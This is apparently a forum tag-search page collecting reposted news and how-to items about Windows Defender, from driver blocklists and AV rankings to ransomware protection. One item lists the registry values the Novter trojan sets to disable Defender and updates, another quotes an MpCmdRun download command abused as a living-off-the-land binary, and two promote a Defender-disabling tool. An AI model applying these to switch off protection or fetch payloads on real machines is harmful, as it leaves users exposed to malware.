Jump to content

Search the Community

Showing results for tags 'windows defender'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station


  • Drivers
  • Filesharing
    • BitTorrent
    • eDonkey & Direct Connect (DC)
    • NewsReaders (Usenet)
    • Other P2P Clients & Tools
  • Internet
    • Download Managers & FTP Clients
    • Messengers
    • Web Browsers
    • Other Internet Tools
  • Multimedia
    • Codecs & Converters
    • Image Viewers & Editors
    • Media Players
    • Other Multimedia Software
  • Security
    • Anti-Malware
    • Firewalls
    • Other Security Tools
  • System
    • Benchmarking & System Info
    • Customization
    • Defrag Tools
    • Disc & Registry Cleaners
    • Management Suites
    • Other System Tools
  • Other Apps
    • Burning & Imaging
    • Document Viewers & Editors
    • File Managers & Archivers
    • Miscellaneous Applications
  • Linux Distributions


  • General News
  • File Sharing News
  • Mobile News
  • Software News
  • Security & Privacy News
  • Technology News

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 19 results

  1. Vulnerable Driver Blocklist is a new security feature of Windows Defender on Windows 10, Windows 11 and Windows Server 2016 or newer devices that protects against malicious or exploitable drivers. Announced by Microsoft's Vice President of Enterprise and OS Security, David Weston, on Twitter, the Microsoft Vulnerable Driver Blocklist is a new security feature that is enabled by default on Windows 10 in S mode devices and on devices that have the Core Isolation feature Memory Integrity, which Microsoft may also refer to as Hypervisor-protected code integrity (HVCI), enabled. Memory integrity, or HVCI, makes use of Microsoft's Hyper-V technology to protect Windows kernel-mode processes against malicious code injections. The feature was not enabled on existing devices when it first shipped, but it appears to be enabled by default on devices with new installations of Windows. Some users reported issues with certain devices with HVCI enabled, and that disabling it resolved the issues that they experienced. The core idea behind the new protective feature is to maintain a list of drivers that will be blocked by Windows Defender because the drivers have at least one of the following attributes: Known security vulnerabilities that can be exploited by attackers to elevate privileges in the Windows kernel Malicious behaviors (malware) or certificates used to sign malware Behaviors that are not malicious but circumvent the Windows Security Model and can be exploited by attackers to elevate privileges in the Windows kernel Microsoft cooperates with hardware vendors and OEMs to maintain the blocklist. Suspected drivers may be submitted to Microsoft for analysis and manufacturers may request that changes are made to drivers that are on the vulnerable blocklist, e.g., after patching an issue. Devices that run Windows 10 in S mode and devices with HVCI enabled protect against these security threats once the feature is rolled out to devices. Windows users and administrators may enable the Memory Integrity prerequisite in the following way on non-Windows 10 S-mode devices: Select Start and then Settings, or use the keyboard shortcut Windows-I to open the Settings application. On Windows 10, go to Update & Security > Windows Security. Select Open Windows Security. On Windows 11, go to Privacy & Security > Windows Security > Select Open Windows Security. Select Device Security from the sidebar on the left side. Activate the "core isolation details" link. Toggle the Memory Integrity setting to On to enable the feature. Restart the device. Windows administrators will see the new Microsoft Vulnerable Driver Blocklist on the Core isolation page of Windows Security once the feature becomes available. The feature can be toggled on or off, and also managed through other means. David Weston notes that turning it on will enable a more aggressive blocklist. Microsoft states that it recommends enabling HVCI or using S mode, but that administrators may also block the drivers on the list using an existing Windows Defender Application Control policy. The documentation lists an XML file that contains the blocked drivers ready for use. Now You: is memory integrity enabled on your devices, if you use Windows Defender? Windows Defender: Vulnerable Driver Blocklist protects against malicious or exploitable drivers
  2. WinDefLogView is a new portable application by Nirsoft. The program displays information about recent threats that the default Windows security solution detected. While it is possible to check detected threats elsewhere, doing so requires quite a few clicks in the Windows Security app. The way results are displayed is also not ideal for getting a quick overview of recent threats. WinDefLogView is a typical Nirsoft application. It is small in size and portable. Just download the archive from the Nirsoft website, extract it on the system, and run the executable file to launch the app. The program is compatible with Microsoft's Windows 10 and 11 operating systems only, but it may be run on older versions of Windows, e.g., Windows 7, to display information from remote systems running Windows 10 or 11. The interface displays all detected threats in a table. Each line lists the filename, detection name, threat name, severity, category, action, origin, process name and more. A click on a column header sorts the listing accordingly, e.g., by date or severity. The shortcut Ctrl-F or the selection of Edit > Find displays a search option to filter based in input; this is useful if lots of threats are displayed. The selection of File > Choose data source enables you to retrieve the data from remote computer systems or external folders. The right-click menu displays several options. The most interesting opens the threat URL on Microsoft's website, which offers additional information on the detected threat. WinDefLogView is a threat viewer, which means that it does not offer any options to react to the threats it displays. Some or all lines can be exported to the local system in several formats, including CSV, JSON and XML. Items can also be copied directly using CTRL-C. The copied items can then be pasted into spreadsheet applications such as Excel. Description on Nirsoft's website: WinDefLogView is a tool for Windows 10 and Windows 11 that reads the event log of Windows Defender (Microsoft-Windows-Windows Defender/Operational) and displays a log of threats detected by Windows Defender on your system. For every log line, the following information is displayed: Filename, Detect Time, Threat Name, Severity, Category, Detection User, Action, Origin, and more... You can view the detected threats log on your local computer, on remote computers on your network, and on external disk plugged to your computer. Closing Words WinDefLogView is a useful application, as it provides a quick view of all detected Windows Defender threats. While it does not support threat actions, it may point users in the right direction immediately without having to use the cumbersome Windows Security application. Now You: do you use Windows Defender? Display all threats that Windows Defender detected with WinDefLogView
  3. In its rankings for 2021, anti-virus assessment firm AV-Comparatives wasn't super-impressed by Windows Defender, at least when compared to some of its rival products. However, AV-TEST had a somewhat different opinion as its report showed Microsoft Defender doing exceptionally well in the second half of the year reports, scoring full marks in both the October 2021 test and the December 2021 assessment. But, despite the great showing, Microsoft and fans of the Defender antivirus solution may be somewhat disappointed as the consumer version of the product failed to win any of the awards that AV-TEST conferred to the products it felt were the best anti-virus solutions of 2021. For Windows, three awards were given for three different categories: Best Protection Best Performance Best Usability As stated above, Defender failed to secure any of the categories for its consumer product. In case you are wondering who the winners are, they are listed below under the categories they won in. Best Protection Bitdefender Kaspersky Norton 360 Best Performance ESET G DATA Kaspersky Norton 360 PC Matic Protected.net Total AV Best Usability Avira ESET Not all is bad for Microsoft though as Defender managed to snag a win in the Best Protection for Corporate users category. You can view the full report here. Windows Defender for home users fails to win any of AV-TEST's best anti-virus 2021 awards
  4. qtkite's Defender Control is a portable app capable of turning off Windows Defender without the need to install an antivirus. This little app makes it simple to turn off Windows Defender without jumping through hoops. Of course, you should always have an up-to-date antivirus solution on your machine. But there are times when you need to turn it off, like when using certain software, for instance. qtkite's Defender Control makes it quick and efficient. The same simplicity is applied to enabling protection; run the enable.exe and it will be active again. qtkite's Defender Control gains TrustedInstaller permissions and will disable windefender services & smartscreen. It also will disable anti-tamper protection and all relevant registries + wmi settings. Writeup: If you are interested in how I developed this program check out the writeup here. Changelog: Defender Control v1.3 - Latest - Jan 25, 2022 Manages the security center service now. Defender Control v1.2 - Oct 14, 2021 Statically linked runtime libraries to binaries. Home: https://github.com/qtkite/defender-control Changelog / Download Page: https://github.com/qtkite/defender-control/releases Downloads - v1.3: disable-defender.exe 294 KB enable-defender.exe 293 KB Source code (zip) Source code (tar.gz)
  5. Microsoft fixes Windows Defender flaw which would execute instead of deleting malware Microsoft has fixed a flaw in Windows Defender which was being actively exploited in the wild. The Microsoft Defender Remote Code Execution Vulnerability (CVE-2021-1647) would see Windows Defender turn into the attacker, triggering the execution of malware when the malware was scanned, instead of quarantining and deleting it. This means a file could be sent by email or USB drive, and when downloaded and automatically scanned be immediately triggered. The exploit was fixed as part of Patch Tuesday on the 12th and was one of 80 flaws which were addressed. To check if you are protected, checked the version number of the scan engine in the Windows Security app by searching for Windows Security in the start menu, opening the app, and going to Settings and About. Version 1.1.17700.4 and above are not vulnerable to the exploit. via GrahamCluley Microsoft fixes Windows Defender flaw which would execute instead of deleting malware
  6. Turn on Mandatory ASLR in Windows Security I've been using it for quite a while now, it caused no problems or errors with any legitimate programs, games, anti cheat systems etc other than with some "custom" made portable programs. it's Off by default, when you turn it on, you will have to restart your device. Address space layout randomization Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries. The Linux PaX project first coined the term "ASLR", and published the first design and implementation of ASLR in July 2001 as a patch for the Linux kernel. It is seen as a complete implementation, providing also a patch for kernel stack randomization since October 2002.[1] The first mainstream operating system to support ASLR by default was the OpenBSD version 3.4 in 2003,[2][3] followed by Linux in 2005. https://en.wikipedia.org/wiki/Address_space_layout_randomization https://blogs.technet.microsoft.com/srd/2017/11/21/clarifying-the-behavior-of-mandatory-aslr/ Other options that are tuned off by default and you should enable to make your Windows device more secure With the increasing number of threats in cyber security and new ransomwares, If you are only relying on Windows 10's built in security and not using any 3rd party AV such as Kaspersky, you must enable these features to keep yourself secure. Hope everyone stay safe!
  7. Another key Win10 security feature bites the dust: Say goodbye to Windows Defender Exploit Guard There’s a reason why I’m skeptical about the fancy new security features touted for Win10 versions. In many cases, at least for me, they don’t work. Enterprises have a different school of fish to fry, but the benefits of some of the new features just eludes me. Take, if you will, the Windows Defender Exploit Guard. When Win10 version 1709 hit the street, it was billed as a major new security feature that the whole world needs. Although on the surface it seemed like something I could understand — keep rogue programs out of key pieces of Windows — I never got it to work right. Here’s how MS described it back during the 1709 release: Implementing Attack Surface Reduction rules within Windows Defender Exploit Guard. Exploit Guard is a new feature of v1709 that helps prevent a variety of actions often used by malware. You can read more about Exploit Guard here: Reduce attack surfaces with Windows Defender Exploit Guard. Note that we have enabled “block” mode for all of these settings. We are continuing to watch the “Block office applications from injecting into other process” setting; if it creates compatibility problems then we might change the baseline recommendation to “audit” mode for that setting. Please let us know what you observe. That seems like a worthy goal, and I dutifully reported on it. But I never got it to work. Now comes word that Microsoft’s recommending everybody disable it in Win10 1909. From the newly published Security Baseline for 1909: Exploit Protection Because of reported compatibility issues with the Exploit Protection settings that we began incorporating with the Windows 10 v1709 baselines, we have elected to remove the settings from the baseline and to provide a script for removing the settings from machines that have had those settings applied. (See Remove-EPBaselineSettings.ps1 in the download package’s Scripts folder.) So this once-highly-touted security feature has not only bitten the dust, there’s a handy program included in the Security Baselines toolbox that makes it easy to ensure that the %$#@! thing has been turned off everywhere. There’s a reason to be skeptical of new security “features” that you don’t understand…. Source: Another key Win10 security feature bites the dust: Say goodbye to Windows Defender Exploit Guard (AskWoody - Woody Leonhard)
  8. Nirsoft's latest tool helps you manage Windows Defender Threats in bulk WinDefThreatsView is a new freeware tool for Microsoft's Windows 10 and 8.1 operating systems by Nirsoft that assists administrators in managing threats detected by the operating system's built-in antivirus protection Windows Defender Antivirus. Windows Defender Antivirus is the default antivirus solution on Windows 10. Users may install third-party security software which may take over but part of the userbase uses the default solution instead. Like many other built-in Windows tools, Windows Defender Antivirus is not particular well designed when it comes to configuring and managing the application. The program displays a notification when a threat is detected but the only option to deal with those is on a one-on-one basis. Important management dashboards such as the threat history or various protections are not easily located on the system and it often takes lots of clicks and knowledge to open these menus. WinDefThreatsView WinDefThreatsView provides an alternative, at least when it comes to managing detected threats. The free program is provided as a 32-bit and 64-bit version for Microsoft's Windows 10 and 8.1 operating systems. Just run the program from any location; it is provided as an archive that you need to extract first but does not need to be installed. The application lists all detected threats in its interface. For new threats, it is necessary to hit the refresh button if the program is running already to have these picked up and listed as well. The program loads local threat data by default but you can use it to display the threat data of remote computer systems as well. Select Options > Advanced Options to do so. You need to switch to "Load threats data from remote computer" and specify the computer name and username/password if required. Note that you may run the tool on a Windows 7 machine to connect to a supported operating system using the remote computer option. All threats are listed with the filename, threat name, severity, domain user and process name, time and data of initial detection and remediation, threat ID and status, action, paths, and more. All data or a selection can be saved to various file types including txt, csv, xml and json. A right-click on a selection displays options to handle all selected threats at once. Select "Set default action for selected threats" to select an action, e.g. quarantine, allow, block or remove, that you want applied to the threat. You may use it to manage all threats or a subset of threats at once which improves manageability significantly. You may also run the program from the command line but only to export threats to a new file that you specify. Closing Words WinDefThreatsView is a handy portable program for Microsoft Windows administrators who manage systems with Windows Defender Antivirus enabled. Besides the useful option to manage multiple threats at once, it is also capable of exporting threat data to several file formats. Landing Page: https://www.nirsoft.net/utils/windows_defender_threats_view.html Source: Nirsoft's latest tool helps you manage Windows Defender Threats in bulk (gHacks - Martin Brinkmann) [ Software Updates post here... https://www.nsaneforums.com/topic/369016-windefthreatsview-100/ ]
  9. Microsoft patches Windows Defender bug with the latest update Just a couple of days back we covered a bug that caused Windows Defender to skip some items during an antivirus scan. While Microsoft didn’t officially acknowledge the issue, the company has issued a new update which fixes the bug. Today, Microsoft has released KB4052623 update along with Security Intelligence Update for Windows Defender (v4.18.2003.8) which fixes the scanning issue for all the Windows 10 users. KB4052623 is currently available for Windows 10 Home, Pro and Enterprise users. Unfortunately, the update comes with a couple of known issues which might affect some users. Known issues: New file pathBecause of a change in the file path location in the update, many downloads are blocked when AppLocker is enabled. To work around this issue, open Group Policy, and then change the setting to Allow for the following path: %OSDrive%\ProgramData\Microsoft\Windows Defender\Platform\* Secure Boot issue in version 4.18.1901.7 Some devices that are running Windows 10 do not start if they have Secure Boot turned on. We are working on this issue and plan to provide a fix in a future update. To work around this issue in the meantime, follow these steps: Restart the device, and enter the BIOS. Turn off Secure Boot, and then restart the device again. In an administrative Command Prompt window, run the following command: "%programdata%\Microsoft\Windows Defender\Platform\4.18.1901-7\MpCmdRun.exe" -revertplatform Wait for one minute, and then do the following: Run sc query windefend to verify that the Windows Defender service is running. Run sc qc windefend to verify that the Windows Defender binary no longer points to version 4.18.1901.7. Restart the device, re-enter the BIOS, and then turn on Secure Boot. The new update is available through Windows Update and WSUS. Alternatively, users can also download the new update from Microsoft Update Catalog and install it manually. Source: Microsoft patches Windows Defender bug with the latest update (MSPoweruser)
  10. A few days ago, we came to learn about a new Windows Defender Preview app that Microsoft has been working on. It was speculated that the new application might be a new Defender version built specifically for Windows 11. However, that appears not to be the case. Twitter leakster WalkingCat shared the Microsoft Store link for Windows Defender Preview two days ago on his handle. From the store, we come to know that the new app will run on Windows 10 too, as long as the build is 19041.0 or newer. As such, I fired it up on my Windows 10 PC but when trying to proceed from the initial Get Started screen (image at top), we are greeted with a message that reads "Your account isn't authorized to use Microsoft Defender yet". This blocks us from proceeding further. A Twitter user Ahmed Walid however was able to use a hack to bypass this block and has posted some screenshots of the user interface of the new Microsoft Defender Preview. The application is still a work in progress with more features like "Identity" and "Connections" labeled as Coming soon. Below is what the home screen of the new Defender app appears like: Overall, the new Microsoft Defender Preview seems unfinished still with some work remaining to be done on it. After that, the application could begin rolling out to Insiders first before being generally available. More images of the new Microsoft Defender Preview app leak out
  11. Microsoft appears to be readying a new Windows Defender Preview app for Windows 11, according to a tweet by Alumia. The app has the code-name GibraltarApp and appears to be rebuilt using WPF and XAML. It will replace the current inbox app in Windows 11. It is claimed to offer “simple, seamless and personalized protection” to users and is expected to roll out to Windows Insiders in the near future. via Deskmodder Microsoft appears to be working on a new Windows Defender app for Windows 11
  12. Novter Trojan Sets its Sights on Microsoft Windows Defender The Novter Trojan, also known as Nodersok or Divergent, is the latest Trojan to actively target Microsoft's Windows Defender by attempting to disable it. Last week, three reports came out about a new fileless Trojan that installs Node.JS onto a victim's machines and configures it as a proxy server for click-fraud and other malicious activity. This Trojan is named by Microsoft as Nodersok, Divergent by Cisco Talos, and Novter by Trend Micro. With Windows Defender maturing into a full-fledge AV solution and becoming tightly integrated into the Windows operating system, recent Trojans have been making an effort to disable its real-time protection and other features. This will allow Trojans to download further malware without risk of Defender detecting them or for future definition updates from detecting existing malware. As previously explained by all three companies, when installed Novter will execute a PowerShell script that disables Windows Defender and modifies Windows Update settings. This is becoming more common as we have seen TrickBot and Gootkit disable Windows Defender in recent variants. According to security researcher Vitali Kremez, who also reverse engineered Novter, the malware will add a variety of Windows policies that disable various functionality in Windows Defender. Novter disabling Windows Defender The policies that are created are as follows: // Disables Windows Defender. 3rd Party security software could be affected HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ "DisableAntiSpyware" = 1 // Prevents Windows Defender from automatically removing detected items HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ "DisableRoutinelyTakingAction" = 1 // Disables Windows Defender real-time protection HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\ "DisableRealtimeMonitoring" = 1 // Enable Automatic Updates. 0 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\ "NoAutoUpdate" = 0 // 2 = Notify before download. In other words, don't automatically download and install HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "AUOptions" = 2 // ScheduledInstallDay, 0 = Every day HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "ScheduledInstallDay" = 0 // ScheduledInstallTime, 03:00 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "ScheduledInstallTime" = 3 // Disable peer-to-peer windows updates HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization "DODownloadMode" = 0 Once these policies are created, Windows Defender will be disabled on the machine and new Windows updates will not be installed automatically. This leaves the computer open to vulnerabilities and lack of real-time protection if they are not using a third-party security product. As Windows Defender continues to grow into a product that stands on its own merits, we will see more malware continue utilize similar techniques to bypass security such as Windows Defender. This leaves the computer open to vulnerabilities and lack of real-time protection if they are not using a third-party security product. As Windows Defender continues to grow into a product that stands on its own merits, we will see more malware continue utilize similar techniques to bypass security such as Windows Defender. Source: Novter Trojan Sets its Sights on Microsoft Windows Defender
  13. The free, built-in antivirus software in Windows 10 performs just as well as -- or even better than -- many of its paid competitors. After years of lagging behind competitors, Microsoft Windows Defender has earned a coveted AV-Test "Top Product" award. The free, built-in antivirus software in Windows 10 performs just as well as — or even better than — many of its paid competitors. Your Windows PC can now repel the vast majority of malware threats right out of the box. AV-Test, a German testing lab, periodically evaluates security suites for Windows, Mac, Android and occasionally Linux systems. As recently as 2015, Microsoft Windows Defender ranked among the weakest antivirus programs on the market. Since then, however, Microsoft has been making steady strides toward the top, and the tech giant's efforts finally paid off in AV-Test's latest rounds of tests. While it has yet to achieve a perfect score — something that rivals Avira, Kaspersky Lab and McAfee were able to accomplish — Microsoft can finally make a convincing argument that you don't really need to install a third-party antivirus program to protect Windows 10. (Microsoft's Windows 7 security protocols earned similar accolades back in March.) For those of you not familiar with AV-Test's protocols, it rates software out of a possible 18 points: six for protection, six for performance and six for usability. Anything that gets a 17.5 or 18 is a Top Product; anything that gets below a 10 is not recommended. This time around, all 18 programs evaluated did pretty well. Avira Antivirus Pro, Kaspersky Lab Internet Security and McAfee Internet security all earned perfect 18s. (McAfee, like Microsoft, was an underdog in AV-Test's rankings for a long time.) Ahn Lab V3 Internet Security, Avast Free Antivirus, Bitdefender Internet Security, Microsoft Windows Defender, Microworld eScan internet security suite, Symantec Norton Security and VIPRE Security all earned 17.5 points apiece, which also made them AV-Test Top Products. At the other end of the spectrum were Comodo Internet Security with 15.5 points, and F-Secure Safe with 16 points. However, since both of these programs earned perfect 6s for protection, they are capable of keeping your PC safe; it's just a matter of performance and usability. BullGuard Internet Security, G Data InternetSecurity, K7 Computing TotalSecurity, PC Pitstop PC Matic and Trend Micro Internet Security all earned 16.5 or 17 points, which means they're all reliable and functional, but not the absolute best the AV market has to offer. No matter what program you use, though, there's a lot of good news in this round of AV-Test's rankings. More than half of the programs tested earned top marks, and even the laggards stopped just about every piece of malware dead in its tracks. Furthermore, thanks to Windows Defender, you can now keep your computer pretty safe just by following recommended Windows protocols. Source
  14. How to enable Ransomware Protection in Windows Defender and add custom folders to it Windows Defender has been gaining a foothold steadily for the past few years. But there is one flaw in the antivirus that ships with Windows 10. The option for Ransomware Protection is disabled by default even though it is available as a native option since the release of Windows 10 version 1709. Initially I was bemused by this, but then I thought it is possible that Windows Defender could identify a legitimate application as a threat and block it, which is not something the user would want. Quite a few third-party anti-ransomware programs exist and they do suffer from false positive issues as well. Check out our reviews of AppCheck AntiRansomware, Acronis Ransomware Protection, TrendMicro Ransombuster, or our overview of Anti-Ransomware software for Windows to get started. For those unaware, ransomware is one the deadliest form of malware. It silently encrypts your data (pictures, videos, documents are commonly targeted), thus preventing you from accessing them. It may even lock the bootloader when you reboot/turn off the computer. The malware displays a screen demanding a ransom from the user which usually involves a crypto-currency payment address that you have to send money to. There is no guarantee that a payment will provide the unlock key required to regain access to files that the ransomware encrypted while it ran on the system. Ransomware attacks are often accompanied by a timer to add another pressure layer to the ransomware demand. Affected users are asked to pay the amount in time as they won't be able to decrypt their files anymore once the timer runs out. Decryption tools are available for some ransomware types but these are released after an outbreak usually and not available right from the get-go. Many companies, hospitals, and users fell victim to ransomware already. You may have heard of the ruckus caused world-wide by the WannaCry ransomware back in 2017, and that is just one example of ransomware causing havoc worldwide. Besides being very cautious when using the computer, there are only a few options to protect against ransomware attacks. Two of the most effective are backups and security software that protects against ransomware. How to enable Ransomware Protection in Windows Defender 1. Open the Windows Security Dashboard by double-clicking on the Defender taskbar icon (or use the Settings app and select Update & Security > Windows Security). 2. Click on Virus & Threat Protection. 3. Scroll down to Ransomware Protection. 4. Click on Manage Ransomware Protection (click Okay on the UAC pop-up if it is displayed). 5. On the next page, you will find a toggle for Controlled Folder Access. Enable the option. That's it. Most antivirus programs use behavioral scanning to prevent zero-day attacks (new or unidentified malware). In other words, they monitor your computer's services, applications, anything in the background, for suspicious activity. For example, when an otherwise harmless file tries to gain access to your documents folder to execute a script that encrypt the files in it, Windows Defender will stop the malware to protect your data. It's a sort of intrusion prevention or anti-exploit method. By default, the Ransomware Protection only covers specific folders. To view the ones that are secured, click on the Protected Folders option. It's just the User folders like Documents, Pictures, Videos, Music, Desktop, Favorites by default. Tip: Add blocked programs to Controlled Folder Access' whitelist So, what happens if a ransomware targets files in other folders? The files are affected unless the ransomware is quarantined before it starts to encrypt files on the device. Fortunately, there is a way to secure them. There is an option on the top of the Protected Folders screen, which says "Add a protected folder". Click on it and choose any folder you want and it will be protected by Windows Defender. The folders can be on any partition or hard drive: they will be secured by the feature. This method is not completely fool-proof but it's better than nothing. You might want to backup your data to an external drive regularly as well. Don't forget to checkout ConfigureDefender for more control. Source: How to enable Ransomware Protection in Windows Defender and add custom folders to it (gHacks)
  15. How to exclude files and folders from Windows Defender scans Windows 10's built-in antivirus tool Microsoft Defender uses threat signatures, behavioral detection, and machine learning models to automatically detect and block suspicious files, folders, and processes. However, sometimes legitimate programs or programs created by your organization may receive false-positive detections in Windows Defender leading to the executable being quarantined. A false positive detected in Microsoft Defender False positives are particularly common among tools used by cybersecurity researchers that share many of the characteristics of malware but are, in fact, just tools that can be used for a good or harmful activity. Fortunately, Microsoft allows you to exclude files and folders, so they are not scanned by Microsoft Defender. This feature is for those who need to run apps or programs that have been detected as malicious, but you are confident are safe. How to use the exclusion feature of Windows Defender It is important to remember that you should never exclude a file or folder from antivirus scans unless you know for 100% that they are safe and legitimate files. Otherwise, if you exclude a folder and mistakenly execute malware from it, Microsoft Defender will not detect and quarantine the malware. To exclude a file or folder from being scanned by Microsoft Defender, please follow these steps: Open Start Menu and then click on Settings. When the Settings window opens, click on Update & Security, and then select Windows Security. In the Windows Security windows, click on Virus & Protection, as shown by the red arrow below. The Windows Security settings screen When the Virus & threat protection screen opens, click on the Manage settings option. Under Exclusions, click on Add or remove exclusions. You will now be at the Exclusions screen, where you can add a new excluded file, folder, file type, or process. To exclude one of these items, click on Add an exclusion and select the type of item you wish to exclude. When excluding a file or folder, you will be asked to select the file/folder you wish to exclude. If you wish to exclude a file type, you need to specify a file type extension to exclude. For example, '.txt' would exclude all files ending with the .txt extension from Microsoft Defender scans. Finally, if you exclude a process, you should enter the full path to the executable. For example, 'C:\exclude\test.exe'. When done adding exclusions, you can close the Windows Security settings screen. Once added, Windows Defender will not scan or detect your file or app as malicious. It's also worth noting that a folder exclusion will apply to all subfolders within the folder as well. Source: How to exclude files and folders from Windows Defender scans
  16. qtkite's Defender Control is a portable app capable of turning off Windows Defender without the need to install an antivirus. This little app makes it simple to turn off Windows Defender without jumping through hoops. Of course, you should always have an up-to-date antivirus solution on your machine. But there are times when you need to turn it off, like when using certain software, for instance. qtkite's Defender Control makes it quick and efficient. The same simplicity is applied to enabling protection; run the enable.exe and it will be active again. qtkite's Defender Control gains TrustedInstaller permissions and will disable windefender services & smartscreen. It also will disable anti-tamper protection and all relevant registries + wmi settings. Writeup: If you are interested in how I developed this program check out the writeup here. Changelog: Defender Control v1.1 - Jul 24, 2021 Added enable-defender Defender Control v1.0 - Jul 22, 2021 Initial release! Run the .exe to disable defender https://www.virustotal.com/gui/file/782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91/detection Home: https://github.com/qtkite/defender-control Changelog / Download Page: https://github.com/qtkite/defender-control/releases Downloads - v1.1: - Includes Disable + Enable Windows Defender disable-defender.exe 40 KB enable-defender.exe 39 KB Source code (zip) Source code (tar.gz) Downloads - v1.0: - Only Disable Windows Defender disable-defender.exe 40 KB Source code (zip) Source code (tar.gz)
  17. HostsFileHijack : Microsoft Defender falsely reports you are infected if you try and block Microsoft telemetry and ads Editing your host file is one way to block Microsoft telemetry and Microsoft-delivered ads on Windows, and it turns out Microsoft is not too happy with it. The latest versions of Microsoft Defender for Windows 10 will detect if you are adding entries to your host file which would block Microsoft’s servers and refuse to allow you to save the file, claiming it is a severe security risk. In fact Microsoft will claim you are infected with “SettingsModifier:Win32/HostsFileHijack”, which a Google search reveals has caused several users to panic and believe they have a virus. e.g.: I do not have Malwarebytes installed, just Windows Security Defender complaining about SettingsModifier:Win32/HostsFileHijack. I also do not know if it’s related or not, but I got the popup right after launching the game SUPERHOT MIND CONTROL DELETE. I actually know what is the HOST file (a bunch of DNS to IP forwarding), so I was curious how the infection was modifying it which could give me information on what is wrong. So I “allowed” the threat via Windows Defender and strangely the file remained the same (with just the default and ::1 to localhost lines). I then asked it to “clean” the threat again, and the HOST file content never changed. With Microsoft weaving Microsoft Defender ever more deeply into Windows, it does bring to mind the question of who actually controls the PC you are using. via WindowsLatest HostsFileHijack : Microsoft Defender falsely reports you are infected if you try and block Microsoft telemetry and ads
  18. Windows Defender’s new feature worry security researchers Windows Defender has added a new feature and security researchers are not too happy, as it has increased the attack surface of Windows. Version 4.18.2007.9 or 4.18.2009.9 of the app has added the ability to download files via the command line using the app, e.g. MpCmdRun.exe -DownloadFile -url [ url] -path [path_to_save_file] … can now be used to download a binary from the internet. While not an exploit in itself, the feature allows a script which can launch the command line to import further files from the internet using native so-called living-off-the-land binaries or LOLBINs. Adding the feature to Windows Defender means there is another app admins have to keep an eye on and another app which hackers can exploit. Fortunately, Windows Defender does still scan the apps it downloads, but this is of course not infallible. The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer. Read more here. Windows Defender’s new feature worry security researchers
  19. Microsoft makes it difficult to disable Windows Defender on Windows 10 Microsoft Defender Antivirus is the default antivirus protection on the company's Windows 10 operating system. If administrators don't install a different antivirus solution, Windows Defender Antivirus is enabled and will protect the system in various ways. Administrators may configure some settings of the program in the Windows 10 Settings application; this includes turning various security feature such as cloud delivered protection, tamper protection, exploit protection or ransomware protection on or off. What administrators cannot do is disable the program entirely using the Settings app. Disabling real-time protection offers a temporary recourse only as it is automatically enabled again by the operating system. Microsoft released an update for the security program earlier this month that introduced two major changes to it. The first made Microsoft Defender Antivirus flag hosts file manipulations as malicious if they contained entries for certain Microsoft servers, mostly Telemetry servers used to submit data from the Windows 10 device to Microsoft. The second change came to light just recently. It appears that Microsoft disabled the Registry key DisableAntiSpyware which administrators could use to disable Microsoft Windows Defender. Most uses should not deactivate Microsoft Defender Antivirus if no other antivirus program is active on the system. In some situations, it may be required to disable the tool: If an installed antivirus solution did not lead to Microsoft Defender Antivirus disabling itself. If the user needs to disable the software because of incompatibilities. If no antivirus software is required. Our colleagues over at Deskmodder note that third-party software such as Defender Control should still work. The equally excellent Configure Defender may work as well. It is unclear at this point in time if the Group Policy options to disable Windows Defender still work. Closing Words Most third-party antivirus solutions come with options to turn off the protection. While not advised, the programs do give users the choice to do so if they choose that option. Are the two changes in the latest version of Microsoft Windows Defender related? Microsoft is tight lipped about the changes and it seems unlikely that it is going to release a public statement about either of these. Microsoft makes it difficult to disable Windows Defender on Windows 10
  • Create New...